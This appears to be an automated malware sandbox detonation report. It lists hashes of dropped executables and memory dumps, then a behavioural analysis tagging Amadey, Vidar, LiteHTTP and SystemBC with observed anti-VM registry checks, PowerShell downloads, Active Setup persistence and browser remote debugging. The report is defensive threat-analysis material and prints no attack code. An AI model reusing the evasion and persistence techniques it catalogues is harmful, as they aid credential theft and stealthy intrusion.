| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c7cb8101f046fa0dffe11ac2f106495e |
| SHA1 | bb3a170385032bbdab45f8637db557d60d97728c |
| SHA256 | f6c6a7dd6fc844872295aad7d19c9a6b5ff1482cfafad769a19b4e984f8374ed |
| SHA512 | 6629c0cc30976f1b93fa629b78558e7faf0f8b14c7cf0e5fdfd390c4bda9d2fe4b4dd44e3bb92c4278706fd590a65a50415b499f8a7d0cac79062febc9d1462c |
memory/2252-93-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2728-92-0x0000000004320000-0x0000000004760000-memory.dmp
memory/2728-91-0x0000000004320000-0x0000000004760000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE
| MD5 | 3a725d19eb529183fd6effa7b48d0ba3 |
| SHA1 | 4411511b81b4a499ce0f3c6a8aff4f12822a0a6a |
| SHA256 | bfff1b564ba5037fac347172893688aaa174a0a01677c8cb02c0435d35a431ee |
| SHA512 | 6da1587a0661929ea61ee75e215e33983e687d725b4feb9eb281561155db5ba68b368bc585b306269cdecf97f75ef435cbc16216287d01ec0b3b0c4a4e20c521 |
memory/1512-117-0x0000000006630000-0x0000000006AE4000-memory.dmp
memory/2740-119-0x00000000012B0000-0x0000000001764000-memory.dmp
memory/1512-118-0x0000000006630000-0x0000000006AE4000-memory.dmp
memory/2740-128-0x00000000012B0000-0x0000000001764000-memory.dmp
memory/1424-129-0x0000000000A40000-0x0000000000F02000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8c5a8d9f0269ce8ffa23ce92a5e4cfc5 |
| SHA1 | 4188b1222b64210c7aa9e5c36ec93d4b10d62854 |
| SHA256 | 64b3962b6d588a1404991fc7d52a913c0ff3c0ae693a5e6700b3b5bd6edd9423 |
| SHA512 | 25132c1cd1c1e747f4526bd7f18ea8c2c09a6ac6bb78dd76d3b3575bbd7e0b5b040727c7661f0e35698fabe05384a629dc0e8a6ad0107890a251b14f5a04a068 |
C:\Temp\ZN3XY9qK2.hta
| MD5 | 39c8cd50176057af3728802964f92d49 |
| SHA1 | 68fc10a10997d7ad00142fc0de393fe3500c8017 |
| SHA256 | f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84 |
| SHA512 | cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6 |
memory/2728-154-0x0000000004320000-0x0000000004760000-memory.dmp
memory/2728-155-0x0000000004320000-0x0000000004760000-memory.dmp
memory/2252-156-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/2252-181-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2236-185-0x0000000001340000-0x00000000017F4000-memory.dmp
memory/1292-184-0x00000000065D0000-0x0000000006A84000-memory.dmp
memory/1292-182-0x00000000065D0000-0x0000000006A84000-memory.dmp
memory/2236-187-0x0000000001340000-0x00000000017F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\2FA8.tmp\2FA9.tmp\2FAA.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2144-208-0x000000001B7A0000-0x000000001BA82000-memory.dmp
memory/2144-209-0x0000000001E90000-0x0000000001E98000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e9b5e7077dc72556bcea2733d8eb72a0 |
| SHA1 | bb7418693c8418b3bfc880ea7c1b8456ff55e4cb |
| SHA256 | 54be3ce80c21d45dfa5c89cfb8109b06eaabfc0f24ae9f11034b187de60e73ab |
| SHA512 | 9bb195ed2f1b841401acc5821c48ab9f5c222e99304171e2720fef9858f776eb13eba2a7a5dba5b689222289d6246e60dbbbbf7f9e4661b5bfd53a9a5feffd34 |
memory/1644-215-0x000000001B850000-0x000000001BB32000-memory.dmp
memory/1644-216-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/1424-217-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/2496-223-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | fe23712855d6e2ea09f5746aef63120e |
| SHA1 | 73768d1238060b470ab511105b01dba945303848 |
| SHA256 | 51abaa84145fb6804577e063c9a50100a3bd83bca0fa2a7c0e7e758c273598ea |
| SHA512 | 3248a8c333b7ed66d91448a3ccbf88045a013ceb6b6bc62e4491dc67cd8059a437aecddfcaee7f637a10698931d09090bda82af0c918aed8ed1a16b085ae7477 |
C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/2252-235-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2472-243-0x00000000011D0000-0x000000000166B000-memory.dmp
memory/1424-241-0x0000000006140000-0x00000000065DB000-memory.dmp
memory/1424-240-0x0000000006140000-0x00000000065DB000-memory.dmp
memory/2472-248-0x00000000011D0000-0x000000000166B000-memory.dmp
memory/1424-249-0x0000000000A40000-0x0000000000F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/2120-262-0x0000000000C30000-0x0000000000CA0000-memory.dmp
memory/2316-276-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-264-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-275-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-274-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2316-272-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-270-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-268-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2316-266-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2496-277-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2496-278-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1424-279-0x0000000006140000-0x00000000065DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/1220-289-0x0000000001090000-0x00000000010A2000-memory.dmp
memory/1220-290-0x00000000003E0000-0x00000000003F0000-memory.dmp
memory/2252-291-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/1424-299-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/2068-305-0x00000000001A0000-0x0000000000200000-memory.dmp
memory/2828-325-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-319-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-323-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2828-315-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-324-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-321-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-317-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-313-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-311-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-309-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-307-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2496-326-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2252-327-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1424-328-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/2496-329-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2252-332-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
memory/1424-403-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/2496-405-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1692-406-0x000000013F7E0000-0x0000000140E2B000-memory.dmp
memory/1412-467-0x000000013F190000-0x000000013FD31000-memory.dmp
memory/1884-474-0x0000000002070000-0x0000000002078000-memory.dmp
memory/1884-473-0x000000001B650000-0x000000001B932000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
memory/2252-482-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1424-489-0x0000000006140000-0x00000000065E1000-memory.dmp
memory/1424-488-0x0000000006140000-0x00000000065E1000-memory.dmp
memory/2252-491-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1424-492-0x0000000000A40000-0x0000000000F02000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar565.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/2496-530-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1424-558-0x0000000006140000-0x00000000065E1000-memory.dmp
memory/1032-559-0x0000000000810000-0x0000000000CB1000-memory.dmp
memory/1424-560-0x0000000006140000-0x00000000065E1000-memory.dmp
memory/1424-561-0x0000000000A40000-0x0000000000F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/2496-582-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2828-674-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-693-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2828-698-0x0000000000400000-0x0000000000429000-memory.dmp
C:\ProgramData\8y5fk\o8gva1vkf
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe
| MD5 | 406ec63e98791e24eb8035264c2c5b11 |
| SHA1 | dee026deb937f5320f1a8a0b45414638fce873d1 |
| SHA256 | 8aabdee4a148a03ddbf124126ffa45e937bf0cb498663ee0d2b63cb5501da61e |
| SHA512 | e4b8f5d95d3ea5d57e0885b57bf48f756c3d46e911334e278ebd360545f8713facf2f668d18e8bd49f633860aa5444611a76d44b1f065d9bd0f929f029ceb839 |
C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe
| MD5 | d054bcb257edeee50293394229ab1c67 |
| SHA1 | 80f84013bdc91aa820a0534a297be285e9f0c9f8 |
| SHA256 | b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e |
| SHA512 | ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26 |
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/2148-985-0x0000000000280000-0x00000000002F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe
| MD5 | d53656310722785044f0636900d64d0a |
| SHA1 | da222b11525b44cb92fb82bcb05ba10cf64ed26d |
| SHA256 | 81f9c75efa3bef3119a2eacb028d7b85b8df8311e4eec39ed49733a7dfc604a8 |
| SHA512 | 0abf5aedd9553e755f5ca9e6104ad769ea607d2ffad5d2a09355668d1de37b59367c82fd712ed5ad4763362ff3a008eb161d94f53d16ed93526557e679896697 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 00:12
Reported
2025-03-06 00:14
Platform
win10v2004-20250217-en
Max time kernel
72s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
